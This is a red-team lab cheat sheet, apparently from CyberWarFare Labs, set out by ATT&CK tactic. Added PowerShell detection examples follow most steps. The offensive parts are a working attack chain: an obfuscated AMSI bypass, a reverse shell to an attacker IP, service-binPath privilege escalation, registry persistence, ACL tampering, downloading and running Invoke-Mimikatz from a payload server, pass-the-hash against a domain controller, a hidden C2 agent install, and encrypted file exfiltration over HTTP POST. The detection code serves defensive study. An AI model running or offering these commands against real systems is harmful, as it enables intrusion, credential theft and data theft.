CyberWarFare Labs

Initial Access

PS Remoting with Failed Login Attempt:
powershell -ep bypass
$UserName = 'cyberwarfare\emp1'
$Password = 'Wrong_Password'
$securepassword = ConvertTo-SecureString $Password -AsPlainText -Force
$pscredentials = New-Object System.Management.Automation.PSCredential ($UserName, $securepassword)
$sess = New-PSSession -ComputerName 10.10.10.5 -Credential $pscredentials -Verbose
PS Remoting with Successful Login Attempt:
powershell -ep bypass
$UserName = 'cyberwarfare\emp1'
$Password = 'Serious@963'
$securepassword = ConvertTo-SecureString $Password -AsPlainText -Force
$pscredentials = New-Object System.Management.Automation.PSCredential ($UserName, $securepassword)
$sess = New-PSSession -ComputerName 10.10.10.5 -Credential $pscredentials -Verbose
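On the target, the failed and the successful remoting attempt above land in the Security log as a 4625 followed by a 4624, both with logon type 3, for the same account from the same source. The following is an added detection example (not from the original page or from CyberWarFare Labs) that flags that sequence; the events are constructed hashtables, and the helper at the end maps live Security-log events into the same shape on a Windows host.

```powershell
# Flags a network logon that succeeds shortly after failed attempts for the same account from the
# same source. Field names follow the Security event XML (TargetUserName, IpAddress, LogonType).

function Find-FailedThenSuccessLogon {
    param(
        [Parameter(Mandatory)][object[]]$Events,   # hashtables with Id, Time, User, Source, LogonType
        [int]$WindowMinutes = 10
    )
    $failures  = $Events | Where-Object { $_.Id -eq 4625 -and $_.LogonType -eq 3 }
    $successes = $Events | Where-Object { $_.Id -eq 4624 -and $_.LogonType -eq 3 }
    foreach ($ok in $successes) {
        # Failures for the same user/source inside the window before the success
        $prior = @($failures | Where-Object {
            $_.User -eq $ok.User -and $_.Source -eq $ok.Source -and
            $_.Time -le $ok.Time -and $_.Time -ge $ok.Time.AddMinutes(-$WindowMinutes)
        })
        if ($prior.Count -gt 0) {
            [pscustomobject]@{ User = $ok.User; Source = $ok.Source; FailuresBefore = $prior.Count; SucceededAt = $ok.Time }
        }
    }
}

# Constructed sample: one wrong password, then the right one, from the same host; a third,
# unrelated logon is not reported.
$t = Get-Date '2024-01-01 09:00:00'
$sample = @(
    @{ Id = 4625; Time = $t;               User = 'emp1'; Source = '10.10.10.20'; LogonType = 3 },
    @{ Id = 4624; Time = $t.AddMinutes(2); User = 'emp1'; Source = '10.10.10.20'; LogonType = 3 },
    @{ Id = 4624; Time = $t.AddMinutes(5); User = 'svc1'; Source = '10.10.10.30'; LogonType = 3 }
)
Find-FailedThenSuccessLogon -Events $sample | Format-Table -AutoSize

# Live use (Windows only): read the last day of 4624/4625 events and flatten the EventData fields.
# Usage: Find-FailedThenSuccessLogon -Events (Get-LogonEventsFromSecurityLog)
function Get-LogonEventsFromSecurityLog {
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624, 4625; StartTime = (Get-Date).AddHours(-$Hours) } |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            @{ Id = $_.Id; Time = $_.TimeCreated; User = $d['TargetUserName']; Source = $d['IpAddress']; LogonType = [int]$d['LogonType'] }
        }
}
```

The window and the logon-type filter are the two knobs worth tuning: a short window with logon type 3 isolates remoting and other network logons, while widening it to all logon types turns this into a general password-guessing check.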

Execution

Bypass AMSI:
[Ref].Assembly.GetType('System.Management.Automation.'+$([Char]([bYtE]0x41)+[CHar]([bYte]0x6D)+[CHar]([byTE]0x73)+[chAR]([byTe]0x69))+'Utils').GetField(''+$([ChAr]([Byte]0x61)+[chAR](8938/82)+[cHAR](115)+[CHAR]([bYtE]0x69))+'InitFailed',$([Char](13+65)+[ChAr]([bYTe]0x6F)+[chAr](141-31)+[CHAR](80)+[CHAr]([bYte]0x75)+[cHar]([byTe]0x62)+[CHAr]([byTE]0x6C)+[chAr]([bYte]0x69)+[CHAR](74+25)+[cHar]([Byte]0x2C)+[CHar]([bYTE]0x53)+[CHAR]([byTe]0x74)+[cHaR](97)+[CHAr](105+11)+[cHaR](9870/94)+[CHAR]([bytE]0x63))).SetValue($null,$true);
Start listening on specified TCP port (Attacker Machine):
nc -nlvp 4443 
Reverse Shell:
# Connect back to the listener and serve it an interactive PowerShell loop
$client = New-Object System.Net.Sockets.TCPClient('192.168.150.4', 4443)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535 | %{0}
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    # Decode the received command, run it, and send the output back with a prompt
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte, 0, $sendbyte.Length)
    $stream.Flush()
}
$client.Close()
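The AMSI bypass above hides the strings AmsiUtils and amsiInitFailed behind mixed-case [Char]/[Byte] casts and small arithmetic so that a plain string match on them fails. With script-block logging (Event ID 4104) enabled, a defender still gets the script text and can undo that obfuscation before matching. The following is an added example (not from the original page or from CyberWarFare Labs) that resolves exactly the two constructions the one-liner uses, [Char]-casts of hex/decimal literals or of a single "a op b" expression, and concatenation inside $( ); the sample input is a constructed fragment in that style.

```powershell
# Normalizes [Char]-cast obfuscation in a script block so it can be matched against plain strings.

function Resolve-CharCastObfuscation {
    param([Parameter(Mandatory)][string]$ScriptText)

    # Matches [chAr]([bYtE]0x41), [cHAR](115), [chAR](8938/82), [Char](13+65) and similar
    $castPattern = '\[char\]\(\s*(?:\[byte\]\s*)?(?<expr>0x[0-9a-f]+|\d+(?:\s*[-+*/]\s*\d+)?)\s*\)'

    $evaluator = [System.Text.RegularExpressions.MatchEvaluator]{
        param($m)
        $expr = $m.Groups['expr'].Value
        if ($expr -match '^0x(?<hex>[0-9a-f]+)$') {
            $code = [Convert]::ToInt32($Matches['hex'], 16)
        } elseif ($expr -match '^(?<a>\d+)\s*(?<op>[-+*/])\s*(?<b>\d+)$') {
            # Evaluate the arithmetic by hand; never hand attacker-controlled text to Invoke-Expression
            $a = [int]$Matches['a']; $b = [int]$Matches['b']
            $code = switch ($Matches['op']) {
                '+' { $a + $b } '-' { $a - $b } '*' { $a * $b } '/' { [int][math]::Floor($a / $b) }
            }
        } else {
            $code = [int]$expr
        }
        "'" + [char]$code + "'"    # replace the cast with a quoted one-character literal
    }

    $text = [regex]::Replace($ScriptText, $castPattern, $evaluator, [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)

    # Fold the string building back together: 'a'+'b' -> 'ab' and $('ab') -> 'ab', until nothing changes
    do {
        $before = $text
        $text = $text -replace "'([^']*)'\s*\+\s*'([^']*)'", "'`$1`$2'"
        $text = $text -replace "\`$\('([^']*)'\)", "'`$1'"
    } while ($text -ne $before)
    $text
}

function Test-AmsiTamperIndicator {
    param([Parameter(Mandatory)][string]$ScriptText)
    $plain = Resolve-CharCastObfuscation $ScriptText
    # Names that only appear in code reaching into AMSI's internals
    $plain -match 'AmsiUtils|amsiInitFailed|AmsiScanBuffer|amsiContext'
}

# Constructed fragment in the style of the bypass above (not the full one-liner)
$sample = @'
[Ref].Assembly.GetType('System.Management.Automation.'+$([Char]([bYtE]0x41)+[CHar]([bYte]0x6D)+[CHar]([byTE]0x73)+[chAR]([byTe]0x69))+'Utils').GetField(''+$([ChAr]([Byte]0x61)+[chAR](8938/82)+[cHAR](115)+[CHAR]([bYtE]0x69))+'InitFailed')
'@
Resolve-CharCastObfuscation $sample
Test-AmsiTamperIndicator $sample
```

The resolver is deliberately narrow: it evaluates nothing it did not parse itself, so a log entry can never execute anything while being normalized. For the constructed fragment it yields the readable GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed') form, and the indicator test returns True.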

Persistence

Registry Modification in Windows:
1. Autorun entry under the current user's RunServicesOnce key:
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Temp\lab.exe"
2. DSRM administrator logon behaviour:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
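Both registry changes above are cheap to audit. The following is an added example (not from the original page or from CyberWarFare Labs) that lists the autorun (Run*) keys and flags entries whose binary lives in a user-writable directory such as C:\Temp, and that reports the meaning of the DsrmAdminLogonBehavior value. Test-AutorunEntry is exercised on a constructed entry matching the reg add command; the Get-* functions read the local registry and are Windows-only.

```powershell
# Audits autorun keys and the LSA DsrmAdminLogonBehavior value.

$AutorunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunServices',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
# Directories an unprivileged user can normally write to; a persisted binary there deserves a look
$WritableRoots = @('C:\Temp\', 'C:\Users\Public\', 'C:\Windows\Temp\')

function Test-AutorunEntry {
    param([Parameter(Mandatory)][string]$Key, [Parameter(Mandatory)][string]$Name, [Parameter(Mandatory)][string]$Data)
    # Reduce "C:\path\prog.exe" /args or C:\path\prog.exe /args to the executable path
    $exe = ($Data -replace '^"([^"]+)".*$', '$1') -replace '^(\S+\.exe).*$', '$1'
    $suspicious = [bool]($WritableRoots | Where-Object { $exe -like "$_*" })
    [pscustomobject]@{ Key = $Key; Name = $Name; Executable = $exe; Suspicious = $suspicious }
}

function Get-AutorunFindings {
    foreach ($key in $AutorunKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath, PSParentPath and friends
            Test-AutorunEntry -Key $key -Name $p.Name -Data ([string]$p.Value)
        }
    }
}

function Get-DsrmLogonBehavior {
    # 0 or absent: DSRM administrator usable only in Directory Services Restore Mode (default)
    # 1: also usable while AD DS is stopped; 2: usable at any time, which the New-ItemProperty above sets
    $v = (Get-ItemProperty 'HKLM:\System\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue).DsrmAdminLogonBehavior
    $finding = if ($v -eq 2) { 'DSRM administrator can log on to the DC at any time; set back to 0 or remove the value' }
               elseif ($v -eq 1) { 'DSRM administrator usable while AD DS is stopped' }
               else { 'default behaviour' }
    [pscustomobject]@{ DsrmAdminLogonBehavior = $v; Finding = $finding }
}

# Constructed entry matching the reg add command above; reported with Suspicious = True
Test-AutorunEntry -Key 'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce' -Name 'Pentestlab' -Data 'C:\Temp\lab.exe'
```

Run Get-AutorunFindings on a workstation and Get-DsrmLogonBehavior on a domain controller; the DSRM value has no legitimate reason to sit at 2 outside a recovery exercise.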

Privilege Escalation

Windows Service Modify:
sc.exe config snmptrap binpath= "net localgroup Administrators cyberwarfare\empX /add"
sc.exe stop snmptrap
sc.exe start snmptrap

[logoff]

[then login again, so the new group membership is applied to the user's logon token]
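The sc.exe config change above works because the user can rewrite the service's binary path, after which the Service Control Manager runs an arbitrary command as SYSTEM. The following is an added example (not from the original page or from CyberWarFare Labs) that reviews service binary paths the way a defender would: a binPath that is a command rather than a path to an executable, one that invokes a shell, or one that differs from a recorded baseline is flagged. The baseline and the sample services are constructed; Get-ServiceBinPathFindings reads live services over CIM on Windows.

```powershell
# Flags service binary paths that do not look like a service image or that drifted from a baseline.

function Test-ServiceBinPath {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$BinPath,
        [hashtable]$Baseline = @{}       # service name -> expected binPath
    )
    $reasons = @()
    # A service image is an executable path, optionally quoted and optionally followed by arguments
    if ($BinPath -notmatch '^"?[A-Za-z]:\\[^"]+\.(exe|sys)"?(\s|$)') { $reasons += 'binPath is not a path to an executable' }
    if ($BinPath -match '\b(net|net1|cmd|powershell|pwsh)(\.exe)?\b') { $reasons += 'binPath invokes a shell or net command' }
    if ($Baseline.ContainsKey($Name) -and $Baseline[$Name] -ne $BinPath) { $reasons += "differs from baseline: $($Baseline[$Name])" }
    [pscustomobject]@{ Service = $Name; BinPath = $BinPath; Suspicious = ($reasons.Count -gt 0); Reasons = ($reasons -join '; ') }
}

# Constructed baseline for snmptrap and two sample services: the modified one from the page and a normal one
$baseline = @{ snmptrap = 'C:\Windows\System32\snmptrap.exe' }
$sample = @(
    @{ Name = 'snmptrap'; BinPath = 'net localgroup Administrators cyberwarfare\empX /add' },
    @{ Name = 'Spooler';  BinPath = 'C:\Windows\System32\spoolsv.exe' }
)
$sample | ForEach-Object { Test-ServiceBinPath -Name $_.Name -BinPath $_.BinPath -Baseline $baseline } | Format-Table -AutoSize

# Live use (Windows only); pass a baseline captured earlier with the same function to catch drift
function Get-ServiceBinPathFindings {
    param([hashtable]$Baseline = @{})
    Get-CimInstance Win32_Service | ForEach-Object {
        Test-ServiceBinPath -Name $_.Name -BinPath ([string]$_.PathName) -Baseline $Baseline
    }
}
```

The underlying weakness is the service's security descriptor, not the path itself: checking which principals hold SERVICE_CHANGE_CONFIG (sc.exe sdshow snmptrap) and removing it from non-administrators closes the path that the stop/start sequence above relies on.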


Defense Evasion

-> Change Permissions:

icacls . /grant Everyone:F /T /C /Q

-> Change the folder permissions of "C:\users\Administrator":

$acl = Get-Acl C:\users\Administrator
$AccessRule = New-Object System.Security.AccessControl.FileSystemAccessRule("CYBERWARFARE\empX", "FullControl", "Allow")
$acl.SetAccessRule($AccessRule)
$acl | Set-Acl C:\users\Administrator

(View the change)

Get-Acl C:\users\Administrator | fl

-> Remove the set permissions:

$acl = Get-Acl C:\users\Administrator
# Same account that was granted above, so PurgeAccessRules matches the rule it added
$usersid = New-Object System.Security.Principal.NTAccount("CYBERWARFARE\empX")
$acl.PurgeAccessRules($usersid)
$acl | Set-Acl C:\users\Administrator

(See the removal of permissions)

Get-Acl C:\users\Administrator | fl
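The two ACL changes above leave a recognisable trace: FullControl on a profile directory granted to Everyone, or to an account that is neither the profile owner nor a built-in administrative principal. The following is an added example (not from the original page or from CyberWarFare Labs) that checks a set of access rules for that condition. The rules are built in memory, so the check runs without touching a real profile; Get-ProfileAclFindings applies it to a live directory on Windows.

```powershell
# Reports Allow rules that grant FullControl to broad groups or to unexpected identities.

function Test-AccessRules {
    param(
        [Parameter(Mandatory)][System.Security.AccessControl.FileSystemAccessRule[]]$Rules,
        [string[]]$ExpectedIdentities = @()    # e.g. the directory owner
    )
    # Principals that legitimately hold FullControl on a user profile directory
    $allowed = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators') + $ExpectedIdentities
    $broad   = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
    foreach ($r in $Rules) {
        if ($r.AccessControlType -ne 'Allow') { continue }
        $full = $r.FileSystemRights.HasFlag([System.Security.AccessControl.FileSystemRights]::FullControl)
        $id = $r.IdentityReference.Value
        $isBroad = $id -in $broad
        if ($full -and ($isBroad -or $id -notin $allowed)) {
            [pscustomobject]@{
                Identity  = $id
                Rights    = $r.FileSystemRights
                Inherited = $r.IsInherited
                Reason    = $(if ($isBroad) { 'FullControl granted to a broad group' } else { 'FullControl granted to an unexpected identity' })
            }
        }
    }
}

# Constructed rules: what icacls /grant Everyone:F and the FileSystemAccessRule above add, next to two normal ones
$sample = @(
    New-Object System.Security.AccessControl.FileSystemAccessRule('Everyone', 'FullControl', 'Allow'),
    New-Object System.Security.AccessControl.FileSystemAccessRule('CYBERWARFARE\empX', 'FullControl', 'Allow'),
    New-Object System.Security.AccessControl.FileSystemAccessRule('BUILTIN\Administrators', 'FullControl', 'Allow'),
    New-Object System.Security.AccessControl.FileSystemAccessRule('CYBERWARFARE\Administrator', 'ReadAndExecute', 'Allow')
)
Test-AccessRules -Rules $sample -ExpectedIdentities 'CYBERWARFARE\Administrator' | Format-Table -AutoSize

# Live use (Windows only): the owner of the profile is the one extra identity expected to hold FullControl
function Get-ProfileAclFindings {
    param([string]$Path = 'C:\Users\Administrator')
    $acl = Get-Acl $Path
    Test-AccessRules -Rules $acl.Access -ExpectedIdentities $acl.Owner
}
```

On the constructed input only the Everyone and CYBERWARFARE\empX rules are reported. The same check can be scheduled across C:\Users\* to catch the icacls variant, which touches every file under the current directory.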

Credential Access

OS Credential Dumping:
1. Download Credential Dumping Script from Payload-Server:

iwr -UseBasicParsing http://192.168.250.100/Invoke-Mimikatz.ps1 -OutFile Invoke-Mimikatz.ps1

2. Execute Credential Dumping script on compromised machine:

.\Invoke-Mimikatz.ps1

Invoke-Mimikatz -verbose

Discovery

Domain Trust Discovery:
-> Domain Users Discovery:

net user /domain

-> Domain Group Discovery: 

net group "Domain Admins" /domain


Lateral Movement

Use Alternate Authentication Material
1.1) Download Lateral Movement Script from Payload-Server:

iwr -UseBasicParsing http://192.168.250.100/Invoke-WMIExec.ps1 -OutFile Invoke-WMIExec.ps1

1.2) Execute Lateral Movement Attack on Domain Controller using Pass-the-Hash (PTH):

Invoke-WMIExec -Target 10.10.10.2 -Domain cyberwarfare -Username administrator -Hash 03D1BBD771D9D72827199B9F815635AB -Command "notepad.exe" -verbose
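A pass-the-hash logon like the one above authenticates to the domain controller with NTLM over the network, and the DC records it as Security event 4624 with LogonType 3, AuthenticationPackageName NTLM and LogonProcessName NtLmSsp. The following is an added example (not from the original page or from CyberWarFare Labs) that surfaces such logons for privileged accounts; in a Kerberos-first domain they are rare enough to review by hand. The events are constructed hashtables; live events come from Get-WinEvent on the Security log, using the EventData fields TargetUserName, IpAddress, WorkstationName, LogonType, AuthenticationPackageName and LogonProcessName (trim LogonProcessName, which is logged with a trailing space).

```powershell
# Lists NTLM network logons (type 3) for accounts on a privileged list.

function Find-PrivilegedNtlmLogon {
    param(
        [Parameter(Mandatory)][object[]]$Events,              # hashtables: Time, User, Source, Workstation, LogonType, AuthPackage, LogonProcess
        [string[]]$PrivilegedUsers = @('administrator')
    )
    $Events | Where-Object {
        $_.LogonType -eq 3 -and
        $_.AuthPackage -eq 'NTLM' -and
        $_.User -in $PrivilegedUsers
    } | ForEach-Object {
        [pscustomobject]@{
            Time = $_.Time; User = $_.User; Source = $_.Source
            Workstation = $_.Workstation; LogonProcess = $_.LogonProcess
        }
    }
}

# Constructed sample: an NTLM network logon as administrator from a host outside the lab subnet,
# a normal Kerberos logon by a user, and an interactive console logon on the DC itself.
$t = Get-Date '2024-01-01 10:00:00'
$sample = @(
    @{ Time = $t;               User = 'administrator'; Source = '192.168.250.100'; Workstation = 'ATTACKER'; LogonType = 3; AuthPackage = 'NTLM';      LogonProcess = 'NtLmSsp' },
    @{ Time = $t.AddMinutes(1); User = 'emp1';          Source = '10.10.10.20';     Workstation = 'WS01';     LogonType = 3; AuthPackage = 'Kerberos';  LogonProcess = 'Kerberos' },
    @{ Time = $t.AddMinutes(2); User = 'administrator'; Source = '10.10.10.2';      Workstation = 'DC01';     LogonType = 2; AuthPackage = 'Negotiate'; LogonProcess = 'User32' }
)
Find-PrivilegedNtlmLogon -Events $sample | Format-Table -AutoSize
```

Only the first constructed event is reported. Pairing the source address with the WorkstationName field is the useful next step: a workstation name the domain does not know, or one that does not resolve to the source IP, is typical of tooling that builds its own NTLM messages.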


Data Collection

Collecting password from registry:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Command & Control

Caldera C2 server Network Communication:

$server = "http://192.168.250.X:8888"
$url = "$server/file/download"
$wc = New-Object System.Net.WebClient
# The server picks the agent build from these two headers
$wc.Headers.add("platform", "windows")
$wc.Headers.add("file", "sandcat.go")
$data = $wc.DownloadData($url)
# File name comes from the Content-Disposition response header
$name = $wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=") + 9).Replace("`"", "")
# Stop and replace any earlier copy, then launch the agent hidden, pointed at the server
get-process | ? { $_.modules.filename -like "C:\Users\Public\$name.exe" } | stop-process -f
rm -force "C:\Users\Public\$name.exe" -ea ignore
[io.file]::WriteAllBytes("C:\Users\Public\$name.exe", $data) | Out-Null
Start-Process -FilePath C:\Users\Public\$name.exe -ArgumentList "-server $server -group red" -WindowStyle hidden
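The deployment above has a stable host footprint: an executable written to C:\Users\Public, started hidden by PowerShell, with a command line naming the server. The following is an added example (not from the original page or from CyberWarFare Labs) that triages process-creation records for that combination. The records are constructed; on a host, Security event 4688 (with command-line auditing enabled) or Sysmon event 1 supply the same Image, CommandLine and ParentImage fields.

```powershell
# Scores process launches on three signals and reports those matching at least two.

function Find-SuspiciousAgentLaunch {
    param([Parameter(Mandatory)][object[]]$ProcessEvents)   # hashtables: Image, CommandLine, ParentImage
    $writableRoots = @('C:\Users\Public\', 'C:\Temp\', 'C:\Windows\Temp\')
    foreach ($e in $ProcessEvents) {
        $reasons = @()
        if ($writableRoots | Where-Object { $e.Image -like "$_*" }) { $reasons += 'image in a user-writable directory' }
        if ($e.CommandLine -match '-server\s+https?://')            { $reasons += 'command line names a server URL' }
        if ($e.ParentImage -match '\\powershell\.exe$')             { $reasons += 'spawned by PowerShell' }
        if ($reasons.Count -ge 2) {
            [pscustomobject]@{ Image = $e.Image; CommandLine = $e.CommandLine; Reasons = ($reasons -join '; ') }
        }
    }
}

# Constructed records: the agent launch (file name is assumed) and an ordinary notepad start
$sample = @(
    @{ Image = 'C:\Users\Public\sandcat.exe'
       CommandLine = 'C:\Users\Public\sandcat.exe -server http://192.168.250.X:8888 -group red'
       ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' },
    @{ Image = 'C:\Windows\System32\notepad.exe'
       CommandLine = 'notepad.exe'
       ParentImage = 'C:\Windows\explorer.exe' }
)
Find-SuspiciousAgentLaunch -ProcessEvents $sample | Format-List
```

Only the agent record is reported. Requiring two signals rather than one keeps ordinary installers that drop into C:\Users\Public, or PowerShell launching a signed tool, out of the result set.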


Data Exfiltration

Automated Exfiltration:

Step 1: On the Attacker machine, start listening using 'netcat'

nc64.exe -nlvp 4445

Step 2: On Victim Machine

# -Raw returns one string; without it Get-Content returns an array of lines and ToCharArray() fails
$file = Get-Content C:\Users\priv\Documents\file.txt -Raw
# The key must be 16, 24 or 32 bytes (AES-128/192/256); ConvertFrom-SecureString rejects any other length
$key = (New-Object System.Text.ASCIIEncoding).GetBytes("FEZjEGYbbcyXQHgbZFAbgf94")
$secureString = New-Object System.Security.SecureString
foreach ($char in $file.ToCharArray()) {
    $secureString.AppendChar($char)
}
$encryptedData = ConvertFrom-SecureString -SecureString $secureString -Key $key

Step 3: POST request from Victim Machine: 

Invoke-WebRequest -Uri http://192.168.150.4 -Method POST -Body $encryptedData
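ConvertFrom-SecureString -Key is AES with a key that sits in the script itself, so the POST body above is opaque to a proxy but not to an analyst who recovers the script (for example from script-block logging) together with a capture of the request. The following is an added example (not from the original page or from CyberWarFare Labs) that reproduces the victim-side transform on constructed content and then reverses it, which is how an incident responder scopes what actually left the host. The key is constructed and, as the cmdlet requires, 24 bytes long.

```powershell
# Victim-side transform (as in the page) and the analyst-side reversal with the same key.

function Protect-TextWithKey {
    param([Parameter(Mandatory)][string]$Text, [Parameter(Mandatory)][byte[]]$Key)
    # plaintext -> SecureString -> keyed blob, exactly the sequence of the exfiltration step
    $ss = New-Object System.Security.SecureString
    foreach ($c in $Text.ToCharArray()) { $ss.AppendChar($c) }
    ConvertFrom-SecureString -SecureString $ss -Key $Key
}

function Unprotect-TextWithKey {
    param([Parameter(Mandatory)][string]$Blob, [Parameter(Mandatory)][byte[]]$Key)
    # Reverse the transform with the recovered key and read the SecureString back out
    $ss = ConvertTo-SecureString -String $Blob -Key $Key
    $bstr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($ss)
    try { [Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr) }
    finally { [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr) }
}

# Constructed key (24 ASCII bytes -> AES-192) and constructed file content standing in for file.txt
$key  = [System.Text.Encoding]::ASCII.GetBytes('FEZjEGYbbcyXQHgbZFAbgf94')
$blob = Protect-TextWithKey -Text 'constructed sample: contents of file.txt' -Key $key   # what the POST body carries
Unprotect-TextWithKey -Blob $blob -Key $key   # returns the original text
```

Two things follow for detection: the body is a fixed-alphabet hex string whose length grows with the file, and the request goes to a bare IP with no Host name, both of which are easy proxy-side filters; on the endpoint, ConvertFrom-SecureString -Key next to Invoke-WebRequest -Method POST in one script block is the pairing to alert on.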